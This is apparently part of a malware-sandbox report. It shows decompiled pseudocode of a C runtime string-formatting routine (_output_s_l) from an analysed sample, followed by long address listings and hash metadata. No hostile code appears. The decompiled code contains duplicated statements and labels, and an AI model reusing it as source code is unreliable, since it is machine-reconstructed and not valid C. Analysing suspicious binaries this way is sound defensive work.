                            																	__eax =  *(__ebp - 0x2bc) & 0x00000000;
                            																	__eflags = __eax;
                            																	 *(__ebp - 0x2bc) = __eax;
                            																}
                            															}
                            															__eflags =  *(__ebp - 0x30);
                            															if( *(__ebp - 0x30) >= 0) {
                            																 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0xfffffff7;
                            																 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0xfffffff7;
                            																__eflags =  *(__ebp - 0x30) - 0x200;
                            																if( *(__ebp - 0x30) > 0x200) {
                            																	 *(__ebp - 0x30) = 0x200;
                            																}
                            															} else {
                            																 *(__ebp - 0x30) = 1;
                            															}
                            															 *(__ebp - 0x2c0) =  *(__ebp - 0x2c0) |  *(__ebp - 0x2bc);
                            															__eflags =  *(__ebp - 0x2c0) |  *(__ebp - 0x2bc);
                            															if(( *(__ebp - 0x2c0) |  *(__ebp - 0x2bc)) == 0) {
                            																 *(__ebp - 0x1c) = 0;
                            															}
                            															__eax = __ebp - 0x49;
                            															 *(__ebp - 4) = __ebp - 0x49;
                            															while(1) {
                            																L181:
                            																__ecx =  *(__ebp - 0x30);
                            																 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                            																 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                            																__eflags =  *(__ebp - 0x30);
                            																if( *(__ebp - 0x30) > 0) {
                            																	goto L183;
                            																}
                            																L182:
                            																 *(__ebp - 0x2c0) =  *(__ebp - 0x2c0) |  *(__ebp - 0x2bc);
                            																__eflags =  *(__ebp - 0x2c0) |  *(__ebp - 0x2bc);
                            																if(( *(__ebp - 0x2c0) |  *(__ebp - 0x2bc)) == 0) {
                            																	goto L186;
                            																}
                            																L183:
                            																__eax =  *(__ebp - 8);
                            																asm("cdq");
                            																__ecx =  *(__ebp - 0x2bc);
                            																__edx =  *(__ebp - 0x2c0);
                            																__eax = E0041CE40( *(__ebp - 0x2c0),  *(__ebp - 0x2bc),  *(__ebp - 8),  *(__ebp - 0x2c0));
                            																 *(__ebp - 0x2ac) = __eax;
                            																__eax =  *(__ebp - 8);
                            																asm("cdq");
                            																__eax =  *(__ebp - 0x2bc);
                            																__ecx =  *(__ebp - 0x2c0);
                            																 *(__ebp - 0x2c0) = E0041CDD0( *(__ebp - 0x2c0),  *(__ebp - 0x2bc),  *(__ebp - 8), __edx);
                            																 *(__ebp - 0x2bc) = __edx;
                            																__eflags =  *(__ebp - 0x2ac) - 0x39;
                            																if( *(__ebp - 0x2ac) > 0x39) {
                            																	__edx =  *(__ebp - 0x2ac);
                            																	__edx =  *(__ebp - 0x2ac) +  *(__ebp - 0x260);
                            																	__eflags = __edx;
                            																	 *(__ebp - 0x2ac) = __edx;
                            																}
                            																__eax =  *(__ebp - 4);
                            																__cl =  *(__ebp - 0x2ac);
                            																 *( *(__ebp - 4)) = __cl;
                            																 *(__ebp - 4) =  *(__ebp - 4) - 1;
                            																 *(__ebp - 4) =  *(__ebp - 4) - 1;
                            																L181:
                            																__ecx =  *(__ebp - 0x30);
                            																 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                            																 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                            																__eflags =  *(__ebp - 0x30);
                            																if( *(__ebp - 0x30) > 0) {
                            																	goto L183;
                            																}
                            																goto L182;
                            															}
                            														}
                            														L168:
                            														__eflags =  *(__ebp - 0x2b8);
                            														if( *(__ebp - 0x2b8) >= 0) {
                            															goto L170;
                            														}
                            														goto L169;
                            													}
                            												case 0xe:
                            													while(1) {
                            														L190:
                            														if( *(_t623 - 0x28) != 0) {
                            															goto L216;
                            														}
                            														goto L191;
                            													}
                            											}
                            										case 8:
                            											L30:
                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000002;
                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000002;
                            											goto L33;
                            										case 9:
                            											L31:
                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000080;
                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000080;
                            											goto L33;
                            										case 0xa:
                            											L29:
                            											__ecx =  *(__ebp - 0x10);
                            											__ecx =  *(__ebp - 0x10) | 0x00000001;
                            											 *(__ebp - 0x10) = __ecx;
                            											goto L33;
                            										case 0xb:
                            											L28:
                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000004;
                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000004;
                            											goto L33;
                            										case 0xc:
                            											L32:
                            											__ecx =  *(__ebp - 0x10);
                            											__ecx =  *(__ebp - 0x10) | 0x00000008;
                            											__eflags = __ecx;
                            											 *(__ebp - 0x10) = __ecx;
                            											goto L33;
                            										case 0xd:
                            											L33:
                            											goto L218;
                            									}
                            								} else {
                            									if(0 == 0) {
                            										 *(_t623 - 0x314) = 0;
                            									} else {
                            										 *(_t623 - 0x314) = 1;
                            									}
                            									_t573 =  *(_t623 - 0x314);
                            									 *(_t623 - 0x278) =  *(_t623 - 0x314);
                            									if( *(_t623 - 0x278) == 0) {
                            										_push(L"(\"Incorrect format specifier\", 0)");
                            										_push(0);
                            										_push(0x460);
                            										_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c");
                            										_push(2);
                            										_t530 = L0040E1A0();
                            										_t626 = _t626 + 0x14;
                            										if(_t530 == 1) {
                            											asm("int3");
                            										}
                            									}
                            									L14:
                            									if( *(_t623 - 0x278) != 0) {
                            										goto L16;
                            									} else {
                            										 *((intOrPtr*)(L0040EC70(_t573))) = 0x16;
                            										E00411A50(_t558, _t573, _t621, _t622, L"(\"Incorrect format specifier\", 0)", L"_output_s_l", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x460, 0);
                            										 *(_t623 - 0x2f0) = 0xffffffff;
                            										E0040D380(_t623 - 0x40);
                            										_t503 =  *(_t623 - 0x2f0);
                            										L229:
                            										return E00416CA0(_t503, _t558,  *(_t623 - 0x48) ^ _t623, _t594, _t621, _t622);
                            									}
                            								}
                            							}
                            							L219:
                            							if( *(_t623 - 0x25c) == 0) {
                            								L222:
                            								 *(_t623 - 0x334) = 1;
                            								L223:
                            								_t560 =  *(_t623 - 0x334);
                            								 *(_t623 - 0x2e0) =  *(_t623 - 0x334);
                            								if( *(_t623 - 0x2e0) == 0) {
                            									_push(L"((state == ST_NORMAL) || (state == ST_TYPE))");
                            									_push(0);
                            									_push(0x8f5);
                            									_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c");
                            									_push(2);
                            									_t508 = L0040E1A0();
                            									_t626 = _t626 + 0x14;
                            									if(_t508 == 1) {
                            										asm("int3");
                            									}
                            								}
                            								if( *(_t623 - 0x2e0) != 0) {
                            									 *(_t623 - 0x300) =  *(_t623 - 0x24c);
                            									E0040D380(_t623 - 0x40);
                            									_t503 =  *(_t623 - 0x300);
                            								} else {
                            									 *((intOrPtr*)(L0040EC70(_t560))) = 0x16;
                            									E00411A50(_t558, _t560, _t621, _t622, L"((state == ST_NORMAL) || (state == ST_TYPE))", L"_output_s_l", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x8f5, 0);
                            									 *(_t623 - 0x2fc) = 0xffffffff;
                            									E0040D380(_t623 - 0x40);
                            									_t503 =  *(_t623 - 0x2fc);
                            								}
                            								goto L229;
                            							}
                            							L220:
                            							if( *(_t623 - 0x25c) == 7) {
                            								goto L222;
                            							}
                            							L221:
                            							 *(_t623 - 0x334) = 0;
                            							goto L223;
                            						}
                            					}
                            					L82:
                            					_t593 =  *0x60b4f0; // 0x407424
                            					 *(_t623 - 4) = _t593;
                            					_t497 = E0040DC40( *(_t623 - 4));
                            					_t626 = _t626 + 4;
                            					 *(_t623 - 0x24) = _t497;
                            					goto L86;
                            				}
                            			}


















                            0x00421ba5
                            0x00421ba5
                            0x00421ba5
                            0x00421ba5
                            0x00421ba5
                            0x00421ba5
                            0x00421ba9
                            0x00421bae
                            0x00421bb1
                            0x00421bbe
                            0x00000000
                            0x00000000
                            0x00421bc0
                            0x00421bc0
                            0x00421bca
                            0x00421be6
                            0x00421be9
                            0x00421bef
                            0x00421c17
                            0x00421c1e
                            0x00421c24
                            0x00421c27
                            0x00421c2a
                            0x00421c30
                            0x00421c33
                            0x00421bf1
                            0x00421bf1
                            0x00421bf7
                            0x00421bfa
                            0x00421bfd
                            0x00421c03
                            0x00421c06
                            0x00421c09
                            0x00421c0b
                            0x00421c0e
                            0x00421c0e
                            0x00421c36
                            0x00422302
                            0x00422302
                            0x00422306
                            0x00000000
                            0x00000000
                            0x0042230c
                            0x00422312
                            0x0042231c
                            0x00422331
                            0x00422346
                            0x00422348
                            0x0042234c
                            0x0042234c
                            0x00422333
                            0x00422333
                            0x00422337
                            0x00422337
                            0x0042231e
                            0x0042231e
                            0x00422322
                            0x00422322
                            0x0042231c
                            0x0042235c
                            0x00422368
                            0x0042237e
                            0x00422383
                            0x00422383
                            0x00422399
                            0x0042239e
                            0x004223a7
                            0x004223af
                            0x004223c5
                            0x004223ca
                            0x004223ca
                            0x004223af
                            0x004223d1
                            0x004224a5
                            0x004224b8
                            0x004224bd
                            0x00000000
                            0x004223d7
                            0x004223d7
                            0x004223db
                            0x00000000
                            0x00000000
                            0x004223e1
                            0x004223e1
                            0x004223ee
                            0x004223f7
                            0x004223fd
                            0x004223fd
                            0x0042240c
                            0x00422414
                            0x00000000
                            0x00000000
                            0x0042241a
                            0x00422423
                            0x00422442
                            0x00422447
                            0x0042244a
                            0x00422459
                            0x00422466
                            0x00422471
                            0x00422471
                            0x00000000
                            0x00422471
                            0x00422468
                            0x0042246f
                            0x0042247d
                            0x00422496
                            0x0042249b
                            0x00000000
                            0x0042249b
                            0x00000000
                            0x0042246f
                            0x004224a3
                            0x004224c0
                            0x004224c7
                            0x004224cf
                            0x004224e5
                            0x004224ea
                            0x004224ea
                            0x004224cf
                            0x004224c7
                            0x004224ed
                            0x004224f1
                            0x004224f9
                            0x004224fe
                            0x00422501
                            0x00422501
                            0x00422508
                            0x00422508
                            0x004215df
                            0x004215e5
                            0x004215f2
                            0x004215f7
                            0x00000000
                            0x0042160a
                            0x00421614
                            0x0042163b
                            0x00421622
                            0x00421633
                            0x00421633
                            0x00421614
                            0x00421645
                            0x0042164b
                            0x00421657
                            0x0042165a
                            0x00421668
                            0x0042166b
                            0x00421678
                            0x0042171d
                            0x00421723
                            0x00421730
                            0x00000000
                            0x00000000
                            0x00421736
                            0x0042173c
                            0x00000000
                            0x00421743
                            0x00421743
                            0x0042175b
                            0x00421760
                            0x00421763
                            0x00421765
                            0x0042181f
                            0x00421832
                            0x00421837
                            0x00000000
                            0x0042176b
                            0x0042177e
                            0x00421783
                            0x00421789
                            0x0042178b
                            0x00421794
                            0x00421794
                            0x00421797
                            0x004217a3
                            0x004217a7
                            0x004217ad
                            0x004217af
                            0x004217b4
                            0x004217b6
                            0x004217bb
                            0x004217c0
                            0x004217c2
                            0x004217c7
                            0x004217ca
                            0x004217cd
                            0x004217cf
                            0x004217cf
                            0x004217cd
                            0x004217d0
                            0x004217d0
                            0x004217d7
                            0x00000000
                            0x004217d9
                            0x004217de
                            0x004217fa
                            0x00421802
                            0x0042180f
                            0x00421814
                            0x00000000
                            0x00421814
                            0x004217d7
                            0x00000000
                            0x0042183f
                            0x0042183f
                            0x00421846
                            0x00421849
                            0x0042184c
                            0x0042184f
                            0x00421852
                            0x00421855
                            0x00421858
                            0x0042185f
                            0x00421866
                            0x00000000
                            0x00000000
                            0x00421872
                            0x00421872
                            0x00421879
                            0x00421885
                            0x00421888
                            0x0042188e
                            0x00421895
                            0x00000000
                            0x00000000
                            0x00421897
                            0x00421897
                            0x0042189d
                            0x0042189d
                            0x004218a4
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x004218e7
                            0x004218e7
                            0x004218ee
                            0x004218f1
                            0x0042191b
                            0x0042191e
                            0x0042191e
                            0x00421921
                            0x00421928
                            0x00421928
                            0x0042192c
                            0x004218f3
                            0x004218f3
                            0x004218ff
                            0x00421902
                            0x00421906
                            0x00421908
                            0x0042190b
                            0x0042190b
                            0x0042190e
                            0x00421914
                            0x00421916
                            0x00421916
                            0x00421919
                            0x00000000
                            0x00000000
                            0x00421934
                            0x00421934
                            0x00000000
                            0x00000000
                            0x00421940
                            0x00421940
                            0x00421947
                            0x0042194a
                            0x0042196a
                            0x0042196d
                            0x0042196d
                            0x00421977
                            0x00421977
                            0x0042197b
                            0x0042194c
                            0x0042194c
                            0x00421958
                            0x0042195b
                            0x0042195f
                            0x00421961
                            0x00421961
                            0x00421968
                            0x00000000
                            0x00000000
                            0x00421983
                            0x00421983
                            0x0042198a
                            0x00421996
                            0x00421999
                            0x0042199f
                            0x004219a6
                            0x00421ab9
                            0x00000000
                            0x00421ab9
                            0x004219ac
                            0x004219ac
                            0x004219b2
                            0x004219b2
                            0x004219b9
                            0x00000000
                            0x004219ef
                            0x004219ef
                            0x004219f2
                            0x004219f5
                            0x004219f8
                            0x00421a20
                            0x00421a20
                            0x00421a23
                            0x00421a26
                            0x00421a29
                            0x00421a4e
                            0x00421a4e
                            0x00421a51
                            0x00421a54
                            0x00421a57
                            0x00421a90
                            0x00421aa1
                            0x00000000
                            0x00421aa1
                            0x00421a59
                            0x00421a59
                            0x00421a5c
                            0x00421a5f
                            0x00421a62
                            0x00000000
                            0x00000000
                            0x00421a64
                            0x00421a64
                            0x00421a67
                            0x00421a6a
                            0x00421a6d
                            0x00000000
                            0x00000000
                            0x00421a6f
                            0x00421a6f
                            0x00421a72
                            0x00421a75
                            0x00421a78
                            0x00000000
                            0x00000000
                            0x00421a7a
                            0x00421a7a
                            0x00421a7d
                            0x00421a80
                            0x00421a83
                            0x00000000
                            0x00000000
                            0x00421a85
                            0x00421a85
                            0x00421a88
                            0x00421a8b
                            0x00421a8e
                            0x00421a92
                            0x00000000
                            0x00421a92
                            0x00000000
                            0x00421a8e
                            0x00421a2b
                            0x00421a2b
                            0x00421a2e
                            0x00421a32
                            0x00421a35
                            0x00000000
                            0x00421a37
                            0x00421a3a
                            0x00421a3d
                            0x00421a40
                            0x00421a43
                            0x00421a49
                            0x00000000
                            0x00421a49
                            0x00421a35
                            0x004219fa
                            0x004219fa
                            0x004219fd
                            0x00421a01
                            0x00421a04
                            0x00000000
                            0x00421a06
                            0x00421a09
                            0x00421a0c
                            0x00421a0f
                            0x00421a12
                            0x00421a18
                            0x00000000
                            0x00421a18
                            0x00000000
                            0x00421aa3
                            0x00421aa6
                            0x00421aa9
                            0x00000000
                            0x00000000
                            0x004219c0
                            0x004219c0
                            0x004219c3
                            0x004219c6
                            0x004219c9
                            0x004219e1
                            0x004219e4
                            0x004219e4
                            0x004219e7
                            0x004219cb
                            0x004219ce
                            0x004219d1
                            0x004219d7
                            0x004219dc
                            0x004219dc
                            0x00000000
                            0x00000000
                            0x00421aae
                            0x00421aae
                            0x00421ab1
                            0x00421ab1
                            0x00421ab6
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00421abe
                            0x00421abe
                            0x00421ac5
                            0x00421ad1
                            0x00421ad4
                            0x00421ada
                            0x00421ae1
                            0x00000000
                            0x00422302
                            0x00422302
                            0x00422302
                            0x00422302
                            0x00422306
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00422306
                            0x004222bc
                            0x004222bf
                            0x004222c2
                            0x004222c5
                            0x004222c8
                            0x004222cb
                            0x004222d1
                            0x004222d1
                            0x004222d1
                            0x004222d9
                            0x004222dd
                            0x00000000
                            0x00000000
                            0x004222df
                            0x004222df
                            0x004222e2
                            0x004222e5
                            0x004222e5
                            0x004222ea
                            0x004222ed
                            0x004222f0
                            0x004222f3
                            0x004222f6
                            0x004222f9
                            0x004222fc
                            0x004222fc
                            0x004222ff
                            0x00422302
                            0x00422302
                            0x00422306
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00422306
                            0x00422302
                            0x00421ae7
                            0x00421aed
                            0x00421aed
                            0x00421af4
                            0x00000000
                            0x00421e4e
                            0x00421e4e
                            0x00421e55
                            0x00421e5c
                            0x00421e5c
                            0x00421e5f
                            0x00000000
                            0x00000000
                            0x00421afb
                            0x00421afe
                            0x00421afe
                            0x00421b04
                            0x00421b06
                            0x00421b09
                            0x00421b09
                            0x00421b0e
                            0x00421b0e
                            0x00000000
                            0x00000000
                            0x00421c3b
                            0x00421c3e
                            0x00421c3e
                            0x00421c43
                            0x00421c45
                            0x00421c48
                            0x00421c48
                            0x00421c4e
                            0x00421c4e
                            0x00000000
                            0x00000000
                            0x0042201b
                            0x0042201b
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00421e65
                            0x00421e68
                            0x00421e6b
                            0x00421e6e
                            0x00421e74
                            0x00421e77
                            0x00421e7e
                            0x00421e82
                            0x00421e8d
                            0x00421e8d
                            0x00421e91
                            0x00421ea8
                            0x00421ea8
                            0x00421eaf
                            0x00421eb1
                            0x00421eb1
                            0x00421eb8
                            0x00421eb8
                            0x00421ebf
                            0x00421ed0
                            0x00421edf
                            0x00421ee2
                            0x00421ee6
                            0x00421efc
                            0x00421ee8
                            0x00421ee8
                            0x00421eeb
                            0x00421ef1
                            0x00421ef7
                            0x00421ef7
                            0x00421ee6
                            0x00421f06
                            0x00421f09
                            0x00421f0c
                            0x00421f0f
                            0x00421f12
                            0x00421f15
                            0x00421f1b
                            0x00421f21
                            0x00421f29
                            0x00421f2a
                            0x00421f2d
                            0x00421f2e
                            0x00421f31
                            0x00421f32
                            0x00421f39
                            0x00421f3a
                            0x00421f3d
                            0x00421f3e
                            0x00421f41
                            0x00421f42
                            0x00421f48
                            0x00421f49
                            0x00421f57
                            0x00421f59
                            0x00421f5f
                            0x00421f5f
                            0x00421f65
                            0x00421f67
                            0x00421f6b
                            0x00421f6d
                            0x00421f75
                            0x00421f76
                            0x00421f79
                            0x00421f7a
                            0x00421f88
                            0x00421f8a
                            0x00421f8a
                            0x00421f6b
                            0x00421f8d
                            0x00421f94
                            0x00421f97
                            0x00421f9c
                            0x00421f9c
                            0x00421fa2
                            0x00421fa4
                            0x00421fac
                            0x00421fad
                            0x00421fb0
                            0x00421fb1
                            0x00421fc0
                            0x00421fc2
                            0x00421fc2
                            0x00421fa2
                            0x00421fc5
                            0x00421fc8
                            0x00421fcb
                            0x00421fce
                            0x00421fd3
                            0x00421fd9
                            0x00421fdc
                            0x00421fdf
                            0x00421fdf
                            0x00421fe2
                            0x00421fe2
                            0x00421fe5
                            0x00421ff1
                            0x00000000
                            0x00421ff1
                            0x00421e93
                            0x00421e93
                            0x00421e9a
                            0x00421e9d
                            0x00000000
                            0x00000000
                            0x00421e9f
                            0x00421e9f
                            0x00000000
                            0x00421e9f
                            0x00421e84
                            0x00421e84
                            0x00000000
                            0x00000000
                            0x00421b11
                            0x00421b14
                            0x00421b14
                            0x00421b1a
                            0x00421b75
                            0x00421b7d
                            0x00421b84
                            0x00421b8a
                            0x00421b90
                            0x00421b1c
                            0x00421b1c
                            0x00421b26
                            0x00421b2a
                            0x00421b32
                            0x00421b39
                            0x00421b46
                            0x00421b4d
                            0x00421b59
                            0x00421b5f
                            0x00421b66
                            0x00421b68
                            0x00421b68
                            0x00421b6f
                            0x00421b97
                            0x00421b9d
                            0x00422302
                            0x00422302
                            0x00422306
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00422306
                            0x00000000
                            0x00000000
                            0x00421ff9
                            0x00421ffc
                            0x00421fff
                            0x00422002
                            0x00000000
                            0x00000000
                            0x00421d57
                            0x00421d57
                            0x00421d63
                            0x00421d69
                            0x00421d6e
                            0x00421d70
                            0x00421e1a
                            0x00421e1d
                            0x00421e1d
                            0x00421e20
                            0x00421e34
                            0x00421e3a
                            0x00421e40
                            0x00421e22
                            0x00421e22
                            0x00421e2f
                            0x00421e2f
                            0x00421e42
                            0x00422302
                            0x00422302
                            0x00422306
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00422306
                            0x00422302
                            0x00421d76
                            0x00421d76
                            0x00421d76
                            0x00421d78
                            0x00421d86
                            0x00421d7a
                            0x00421d7a
                            0x00421d7a
                            0x00421d90
                            0x00421d96
                            0x00421d9c
                            0x00421da3
                            0x00421da5
                            0x00421daa
                            0x00421dac
                            0x00421db1
                            0x00421db6
                            0x00421db8
                            0x00421dbd
                            0x00421dc0
                            0x00421dc3
                            0x00421dc5
                            0x00421dc5
                            0x00421dc3
                            0x00421dc6
                            0x00421dcd
                            0x00421e15
                            0x00422302
                            0x00422302
                            0x00422306
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00422306
                            0x00421dcf
                            0x00421dcf
                            0x00421dd4
                            0x00421df0
                            0x00421df8
                            0x00421e02
                            0x00421e05
                            0x00421e0a
                            0x00000000
                            0x00421e0a
                            0x00000000
                            0x0042205c
                            0x0042205c
                            0x00422066
                            0x00422066
                            0x0042206c
                            0x0042206e
                            0x00422071
                            0x00422071
                            0x00422077
                            0x00422077
                            0x00000000
                            0x00000000
                            0x00422014
                            0x00422014
                            0x00000000
                            0x00000000
                            0x00421c51
                            0x00421c51
                            0x00421c55
                            0x00421c63
                            0x00421c66
                            0x00421c57
                            0x00421c57
                            0x00421c57
                            0x00421c6c
                            0x00421c72
                            0x00421c78
                            0x00421c84
                            0x00421c8a
                            0x00421c8a
                            0x00421c90
                            0x00421cf7
                            0x00421cf7
                            0x00421cfb
                            0x00421cfd
                            0x00421d03
                            0x00421d03
                            0x00421d06
                            0x00421d09
                            0x00421d0f
                            0x00421d0f
                            0x00421d0f
                            0x00421d1b
                            0x00421d1e
                            0x00421d24
                            0x00421d26
                            0x00000000
                            0x00000000
                            0x00421d28
                            0x00421d28
                            0x00421d2e
                            0x00421d31
                            0x00421d33
                            0x00000000
                            0x00000000
                            0x00421d35
                            0x00421d3b
                            0x00421d3e
                            0x00421d3e
                            0x00421d46
                            0x00421d46
                            0x00421d4c
                            0x00421d4c
                            0x00421d4f
                            0x00000000
                            0x00421c92
                            0x00421c92
                            0x00421c92
                            0x00421c96
                            0x00421c98
                            0x00421c9d
                            0x00421c9d
                            0x00421ca0
                            0x00421ca7
                            0x00421caa
                            0x00421cb0
                            0x00421cb0
                            0x00421cb0
                            0x00421cbc
                            0x00421cbf
                            0x00421cc5
                            0x00421cc7
                            0x00000000
                            0x00000000
                            0x00421cc9
                            0x00421cc9
                            0x00421ccf
                            0x00421cd2
                            0x00421cd4
                            0x00000000
                            0x00000000
                            0x00421cd6
                            0x00421cdc
                            0x00421cdf
                            0x00421cdf
                            0x00421ce7
                            0x00421ced
                            0x00421cf0
                            0x00421cf2
                            0x00421d52
                            0x00422302
                            0x00422302
                            0x00422306
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00422306
                            0x00422302
                            0x00000000
                            0x0042200b
                            0x0042200b
                            0x00000000
                            0x00000000
                            0x00422027
                            0x00422027
                            0x00422031
                            0x00422031
                            0x0042203b
                            0x0042203b
                            0x00422041
                            0x00422043
                            0x0042204d
                            0x0042204d
                            0x00422050
                            0x00422053
                            0x00422053
                            0x0042207a
                            0x0042207d
                            0x0042207d
                            0x00422082
                            0x004220a4
                            0x004220a4
                            0x004220aa
                            0x004220cc
                            0x004220cc
                            0x004220cf
                            0x00422116
                            0x00422116
                            0x00422119
                            0x00422136
                            0x0042213a
                            0x00422142
                            0x00422142
                            0x00422144
                            0x0042214a
                            0x0042211b
                            0x0042211b
                            0x0042211f
                            0x00422127
                            0x00422128
                            0x0042212e
                            0x0042212e
                            0x004220d1
                            0x004220d4
                            0x004220d4
                            0x004220d7
                            0x004220f5
                            0x00422101
                            0x00422104
                            0x00422105
                            0x0042210b
                            0x004220d9
                            0x004220d9
                            0x004220dd
                            0x004220e5
                            0x004220e6
                            0x004220e7
                            0x004220ed
                            0x004220ed
                            0x00422111
                            0x004220ac
                            0x004220ac
                            0x004220b8
                            0x004220be
                            0x004220be
                            0x00422084
                            0x00422084
                            0x00422090
                            0x00422096
                            0x00422096
                            0x00422153
                            0x00422153
                            0x00422156
                            0x00422198
                            0x00422198
                            0x0042219e
                            0x004221a4
                            0x004221aa
                            0x00000000
                            0x00422158
                            0x00422158
                            0x00422158
                            0x0042215f
                            0x00000000
                            0x00000000
                            0x00422161
                            0x00422161
                            0x0042216c
                            0x00422172
                            0x00422174
                            0x0042217a
                            0x0042217d
                            0x0042217f
                            0x00422185
                            0x0042218e
                            0x00422193
                            0x004221b0
                            0x004221b3
                            0x004221b3
                            0x004221b8
                            0x004221bd
                            0x004221bd
                            0x004221c3
                            0x004221c5
                            0x004221cb
                            0x004221d1
                            0x004221d1
                            0x004221da
                            0x004221da
                            0x004221c3
                            0x004221e0
                            0x004221e4
                            0x004221f2
                            0x004221f5
                            0x004221f8
                            0x004221ff
                            0x00422201
                            0x00422201
                            0x004221e6
                            0x004221e6
                            0x004221e6
                            0x0042220e
                            0x0042220e
                            0x00422214
                            0x00422216
                            0x00422216
                            0x0042221d
                            0x00422220
                            0x00422223
                            0x00422223
                            0x00422223
                            0x00422229
                            0x0042222c
                            0x0042222f
                            0x00422231
                            0x00000000
                            0x00000000
                            0x00422233
                            0x00422239
                            0x00422239
                            0x0042223f
                            0x00000000
                            0x00000000
                            0x00422241
                            0x00422241
                            0x00422244
                            0x00422247
                            0x0042224e
                            0x00422255
                            0x0042225d
                            0x00422263
                            0x00422266
                            0x00422269
                            0x00422270
                            0x0042227c
                            0x00422282
                            0x00422288
                            0x0042228f
                            0x00422291
                            0x00422297
                            0x00422297
                            0x0042229d
                            0x0042229d
                            0x004222a3
                            0x004222a6
                            0x004222ac
                            0x004222b1
                            0x004222b4
                            0x00422223
                            0x00422223
                            0x00422229
                            0x0042222c
                            0x0042222f
                            0x00422231
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00422231
                            0x00422223
                            0x00422163
                            0x00422163
                            0x0042216a
                            0x00000000
                            0x00000000
                            0x00000000
                            0x0042216a
                            0x00000000
                            0x00422302
                            0x00422302
                            0x00422306
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00422306
                            0x00000000
                            0x00000000
                            0x004218c1
                            0x004218c4
                            0x004218c7
                            0x00000000
                            0x00000000
                            0x004218cc
                            0x004218cf
                            0x004218d4
                            0x00000000
                            0x00000000
                            0x004218b6
                            0x004218b6
                            0x004218b9
                            0x004218bc
                            0x00000000
                            0x00000000
                            0x004218ab
                            0x004218ae
                            0x004218b1
                            0x00000000
                            0x00000000
                            0x004218d9
                            0x004218d9
                            0x004218dc
                            0x004218dc
                            0x004218df
                            0x00000000
                            0x00000000
                            0x004218e2
                            0x00000000
                            0x00000000
                            0x0042167e
                            0x00421680
                            0x0042168e
                            0x00421682
                            0x00421682
                            0x00421682
                            0x00421698
                            0x0042169e
                            0x004216ab
                            0x004216ad
                            0x004216b2
                            0x004216b4
                            0x004216b9
                            0x004216be
                            0x004216c0
                            0x004216c5
                            0x004216cb
                            0x004216cd
                            0x004216cd
                            0x004216cb
                            0x004216ce
                            0x004216d5
                            0x00000000
                            0x004216d7
                            0x004216dc
                            0x004216f8
                            0x00421700
                            0x0042170d
                            0x00421712
                            0x004225d1
                            0x004225de
                            0x004225de
                            0x004216d5
                            0x00421678
                            0x0042250d
                            0x00422514
                            0x0042252b
                            0x0042252b
                            0x00422535
                            0x00422535
                            0x0042253b
                            0x00422548
                            0x0042254a
                            0x0042254f
                            0x00422551
                            0x00422556
                            0x0042255b
                            0x0042255d
                            0x00422562
                            0x00422568
                            0x0042256a
                            0x0042256a
                            0x00422568
                            0x00422572
                            0x004225bd
                            0x004225c6
                            0x004225cb
                            0x00422574
                            0x00422579
                            0x00422595
                            0x0042259d
                            0x004225aa
                            0x004225af
                            0x004225af
                            0x00000000
                            0x00422572
                            0x00422516
                            0x0042251d
                            0x00000000
                            0x00000000
                            0x0042251f
                            0x0042251f
                            0x00000000
                            0x0042251f
                            0x00422302
                            0x00421bcc
                            0x00421bcc
                            0x00421bd2
                            0x00421bd9
                            0x00421bde
                            0x00421be1
                            0x00000000
                            0x00421be1

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.254379313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.254298173.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.254460883.0000000000427000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255654257.000000000060A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255687103.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255765961.0000000000635000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_mzQcZawXvh.jbxd
                            Similarity
                            • API ID: _write_multi_char$_get_int_arg_strlen_wctomb_s_write_string
                            • String ID: $t@$("Incorrect format specifier", 0)$-$_output_s_l$f:\dd\vctools\crt_bld\self_x86\crt\src\output.c
                            • API String ID: 2232461714-1826274018
                            • Opcode ID: 63fb849474a1b14ab00d657b05b96aa36585692f8c4d09d9fa708a823a1b6086
                            • Instruction ID: f99a0ced48311691e25e8a193492f807c8a9687741291efd5154416d5b1f4ffc
                            • Opcode Fuzzy Hash: 63fb849474a1b14ab00d657b05b96aa36585692f8c4d09d9fa708a823a1b6086
                            • Instruction Fuzzy Hash: 11A18D70E012299BDF24DF54DD49BEEB7B0BB88304F5481DAE4096B291D7789E80CF59
                            Uniqueness
